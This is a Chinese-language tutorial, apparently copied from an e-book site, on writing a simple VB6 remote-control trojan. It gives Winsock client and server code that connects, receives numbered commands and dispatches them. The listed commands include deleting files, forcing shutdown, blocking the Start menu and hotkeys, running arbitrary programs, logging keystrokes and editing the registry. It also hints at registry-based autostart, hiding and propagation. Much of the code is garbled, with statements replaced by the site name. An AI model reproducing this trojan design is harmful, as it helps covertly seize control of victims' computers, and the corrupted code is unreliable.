浅淡vb6_super红客-爱下电子书

浅淡vb6

bo又称“特洛伊木马”，是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用vb来实现它。

----使用vb建立两个程序，一个为客户端程序client，一个为服务器端程序systry。

----在client工程中建立一个窗体，加载winsock控件，称为tcpclient，协议选择tcp，再加入两个文本框，用以输入服务器的ip地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

privatesubcmdconnect_click

len(bxwx.org)=0andlen(bxwx.org)=0then

msgbox("请输入主机名或主机ip地址。")

exitsub

else

len(bxwx.org)>0thebxwx.org=bxwx.org

elsbxwx.org=bxwx.org

end

endibxwx.org

bxwx.org=true

endsub

----连接建立之后就可以使用dataarrival事件处理所收到的数据了。

----在服务器端systry工程也建立一个窗体，加载winsock控件，称为tcpserver，协议选择tcp，在form_load事件中加入如下代码：

privatesubform_loabxwx.org=199bxwx.org

endsub

----准备应答客户端程序的请求连接，使用connectionrequest事件来应答户端程序的请求，代码如下：

privatesubtcpserver_connectionrequest

(byvalrequestidlong)

bxwx.orgsckclosedthebxwx.org‘检查控件的state属性是否为关闭的。

end'如果不是，在接受新的连接之前先关闭此连接。

bxwx.orgrequestid

endsub

----这样在客户端程序按下了连接按钮后，服务器端程序的connectionrequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

----建立连接后服务器端的程序通过dataarrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用treeview控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。dataarrival事件程序如下：

privatesubtcpserver_dataarrival

(byvalbytestotallong)

dimstrdatastring

dimilong

dimmkeystrinbxwx.orgstrdata

‘接收数据并存入strdata

fori=1len(strdata)

‘分离strdata中的命令

mid(strdata,i,1)=""then

mkey=left(strdata,i-1)

‘把命令id号存入mkey

‘把命令参数存入strdata

strdata=right(strdata,len(strdata)-i)

exitfor

end

nexti

selectcaseval(mkey)

case1

‘驱动器名、目录名、文件名

case2

强制关闭服务器端的计算机

case3

强制重启服务器端的计算机

case4

屏蔽任务栏窗口；

case5

屏蔽开始菜单；

case6

按照客户机端传过来的文件名或目录名，而删除它；

case7

屏蔽热启动键；

case8

运行服务器端的任何程序

endselect

endsub

详细程序略。

----客户机端用bxwx.org发命令。命令包括命令id和命令参数，它们用符号“”隔开。

----另外，当客户机端断开与服务器端的来接后，服务器端应用tcpserver_close事件，来继续准备接收客户机端的请求，其代码如下：

privatesubtcpserver_closbxwx.org

bxwx.org

endsub

----这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

----成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用bo程序破坏别人的系统。